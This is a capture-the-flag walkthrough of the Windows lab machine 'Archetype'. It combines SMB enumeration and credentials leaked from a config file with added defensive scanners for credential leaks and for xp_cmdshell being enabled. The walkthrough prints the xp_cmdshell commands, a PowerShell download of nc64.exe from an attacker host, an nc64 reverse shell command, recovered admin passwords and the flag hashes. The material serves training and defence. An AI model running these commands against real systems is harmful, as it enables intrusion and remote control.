Archetype
Keywords: #SMB, #mssql, #reverse_shell, #windows, #powershell
**Date pwned:** 2024-10-24
Nmap scan report for 10.129.179.223
Host is up (0.026s latency).
Not shown: 65420 closed tcp ports (reset), 103 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
A share in SMB (Server Message Block) is a folder, printer or other resource on a host that is made accessible to other computers over the network, so users on different systems can access files or printers across it.
Administrative shares end in $ (ADMIN$, C$ and IPC$ in the listing below).
smbclient -N -L 10.129.179.223
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
smbclient //10.129.179.223/backups -U anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 20 07:20:57 2020
.. D 0 Mon Jan 20 07:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 07:23:02 2020
5056511 blocks of size 4096. 2617883 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (8.0 KiloBytes/sec) (average 8.0 KiloBytes/sec)
Credentials found in prod.dtsConfig: Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc
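The .dtsConfig on the backups share is an SSIS package configuration file, and the credential sits inside a connection string in a ConfiguredValue element. The following scanner is an added example (not from the writeup) that parses a file in that layout, flags connection strings carrying a plaintext Password/PWD, records the associated User ID and whether Persist Security Info is on, and returns a redacted copy so the finding can be logged without re-exposing the secret. The embedded sample file is constructed; its connection string mirrors the values the writeup recovered from prod.dtsConfig.

```python
"""Scan an SSIS .dtsConfig file for connection strings that embed a plaintext password."""
import xml.etree.ElementTree as ET

# Constructed sample in the SSIS .dtsConfig layout (header values are made up);
# the first connection string mirrors the credentials found in prod.dtsConfig.
SAMPLE_DTSCONFIG = """
<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="ARCHETYPE\\sql_svc" GeneratedFromPackageName="Package" GeneratedDate="2020-01-20"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Logging].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Logs;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

# Connection-string keys that carry a secret, and keys that name the login.
SECRET_KEYS = {"password", "pwd"}
USER_KEYS = ("user id", "uid", "user")


def parse_connection_string(value):
    """Split 'Key=Value;Key=Value;' into a dict keyed by lower-cased key name."""
    pairs = {}
    for part in value.split(";"):
        if "=" not in part:
            continue
        key, val = part.split("=", 1)
        pairs[key.strip().lower()] = val.strip()
    return pairs


def redact(value, secrets):
    """Replace every secret value in the string so findings can be logged safely."""
    out = value
    for secret in secrets:
        if secret:
            out = out.replace(secret, "<REDACTED>")
    return out


def find_plaintext_credentials(xml_text):
    """Return one finding per Configuration whose value holds a plaintext password."""
    root = ET.fromstring(xml_text)
    findings = []
    for conf in root.iter("Configuration"):
        value = conf.findtext("ConfiguredValue") or ""
        pairs = parse_connection_string(value)
        secrets = [v for k, v in pairs.items() if k in SECRET_KEYS]
        if not secrets:
            continue  # integrated auth or no embedded secret: nothing to flag
        user = next((pairs[k] for k in USER_KEYS if k in pairs), None)
        findings.append({
            "path": conf.get("Path", ""),
            "user": user,
            # Persist Security Info=True keeps the password readable after connect.
            "persist_security_info": pairs.get("persist security info", "").lower() == "true",
            "value": redact(value, secrets),
        })
    return findings


if __name__ == "__main__":
    for finding in find_plaintext_credentials(SAMPLE_DTSCONFIG):
        print(finding)
```

Run it over every .dtsConfig found on a share audit; a finding with a non-empty user and persist_security_info set is exactly the kind of file that should never be readable by anonymous SMB logons.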
user.txt in sql_svc: 3e7b102e78218e935bf3f4951fec21a3
Connect to Microsoft SQL Server using the credentials from prod.dtsConfig.
Spawn a Windows command shell through the xp_cmdshell extended stored procedure of Microsoft SQL Server -> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'dir C:\';
Download nc64.exe with PowerShell from the command shell -> powershell -c cd C:\Users\sql_svc\Downloads; wget http://hostIP/nc64.exe -outfile nc64.exe
Execute the reverse shell with PowerShell -> powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe targetIP 443
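Each sp_configure change above leaves a trace: SQL Server writes a "Configuration option '...' changed from X to Y" line to its ERRORLOG, so enabling xp_cmdshell is detectable even when no command auditing is configured. The detector below is an added example (not from the writeup) that parses lines in that format, flags options being switched on that open a path to OS command execution, and replays the log to report the final state of each option. The ERRORLOG excerpt is constructed (timestamps, spids and client address are made up); the revert statement in HARDENING_SQL is the standard way to turn xp_cmdshell back off.

```python
"""Flag xp_cmdshell (and related options) being enabled in SQL Server ERRORLOG lines."""
import re

# Constructed ERRORLOG excerpt in the format SQL Server uses for sp_configure
# changes; timestamps, spids and the client address are made up.
SAMPLE_ERRORLOG = """\
2024-10-24 10:14:55.01 Logon       Login succeeded for user 'ARCHETYPE\\sql_svc'. Connection made using SQL Server authentication. [CLIENT: 192.0.2.10]
2024-10-24 10:15:02.12 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-10-24 10:15:02.30 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-10-24 11:02:10.44 spid60      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options whose enabling hands a SQL login a route to OS-level execution;
# 'show advanced options' is low on its own but is the usual first step.
RISKY_OPTIONS = {
    "xp_cmdshell": "high",
    "Ole Automation Procedures": "high",
    "show advanced options": "low",
}

# Revert statement for the option the writeup switched on.
HARDENING_SQL = "EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;"


def detect_risky_config_changes(log_text):
    """Return one finding per risky option that was turned on (new value 1)."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = CONFIG_CHANGE.match(line)
        if not m:
            continue  # logon lines, backups, etc. are ignored
        option = m.group("option")
        if option in RISKY_OPTIONS and m.group("new") == "1":
            findings.append({
                "line": lineno,
                "ts": m.group("ts"),
                "spid": m.group("spid"),
                "option": option,
                "severity": RISKY_OPTIONS[option],
            })
    return findings


def replay_option_state(log_text):
    """Replay all configuration changes and return the last known value per option."""
    state = {}
    for line in log_text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if m:
            state[m.group("option")] = int(m.group("new"))
    return state


if __name__ == "__main__":
    for finding in detect_risky_config_changes(SAMPLE_ERRORLOG):
        print(f"[{finding['severity']}] line {finding['line']}: {finding['spid']} enabled {finding['option']!r} at {finding['ts']}")
    print("final state:", replay_option_state(SAMPLE_ERRORLOG))
    print("remediation:", HARDENING_SQL)
```

The spid in a finding can be joined to the preceding "Login succeeded" line to learn which SQL login made the change, which is how a low-privileged account such as sql_svc reaching xp_cmdshell would be attributed.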
Get the PowerShell history
cd AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
admin username: administrator
admin password: MEGACORP_4dm1n!!
The PowerShell history contained the admin credentials.
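PSReadLine records every interactive command to ConsoleHost_history.txt, so any password typed on a command line (net use, ConvertTo-SecureString -AsPlainText, a connection string) survives on disk in the user's profile. The scanner below is an added example (not from the writeup) that audits a history file for such lines, redacts the captured secret, and also notes download cradles like the wget/Invoke-WebRequest call used above. The sample history and every username and password in it are constructed; the HISTORY_PATH constant is the standard PSReadLine location.

```python
"""Audit a PSReadLine history file for commands that leaked credentials or fetched tools."""
import os
import re

# Standard per-user location of the PSReadLine console history on Windows.
HISTORY_PATH = r"%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

# Constructed history lines; usernames, hosts and passwords are made up.
SAMPLE_HISTORY = """\
Get-ChildItem C:\\backups
net use T: \\\\fileserver\\backups /user:administrator Adm1n-example!!
$p = ConvertTo-SecureString 'svc-example-pw' -AsPlainText -Force
Invoke-WebRequest http://192.0.2.10/tool.exe -OutFile tool.exe
Invoke-Sqlcmd -ConnectionString "Server=.;User ID=sql_svc;Password=svc-example-pw2"
Get-Process
"""

# Each rule: a name and a pattern; the optional 'secret' group marks what to redact.
RULES = [
    ("net-use-password", re.compile(r"/user:\S+\s+(?P<secret>\S+)", re.I)),
    ("plaintext-securestring",
     re.compile(r"ConvertTo-SecureString\s+['\"](?P<secret>[^'\"]+)['\"].*-AsPlainText", re.I)),
    ("password-assignment",
     re.compile(r"(?:password|pwd)\s*[=:]\s*['\"]?(?P<secret>[^'\"\s;]+)", re.I)),
    ("web-download", re.compile(r"\b(?:Invoke-WebRequest|iwr|wget|curl)\b.*-OutFile\b", re.I)),
]


def redact(line, match):
    """Blank out the matched secret (if the rule captured one) before reporting."""
    if "secret" in match.groupdict() and match.group("secret"):
        start, end = match.span("secret")
        return line[:start] + "<REDACTED>" + line[end:]
    return line


def audit_history(text):
    """Return findings for every history line matching a rule, with secrets redacted."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in RULES:
            m = pattern.search(line)
            if m:
                findings.append({"line": lineno, "rule": name, "command": redact(line, m)})
    return findings


def audit_history_file(path=HISTORY_PATH):
    """Audit the real history file; returns an empty list if PSReadLine has not written one."""
    expanded = os.path.expandvars(path)
    if not os.path.exists(expanded):
        return []
    with open(expanded, encoding="utf-8", errors="replace") as fh:
        return audit_history(fh.read())


if __name__ == "__main__":
    for finding in audit_history(SAMPLE_HISTORY):
        print(f"line {finding['line']:>3} [{finding['rule']}] {finding['command']}")
```

Beyond scanning, the preventive fix is to stop typing secrets interactively (Get-Credential or a stored credential instead of a literal) and to clear or restrict the history file when an account with admin rights has used a shared host.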
Log in as administrator (root) with psexec.py
sudo python3 psexec.py administrator@<target-ip>
root.txt: b91ccec3305e98240082d4474b848528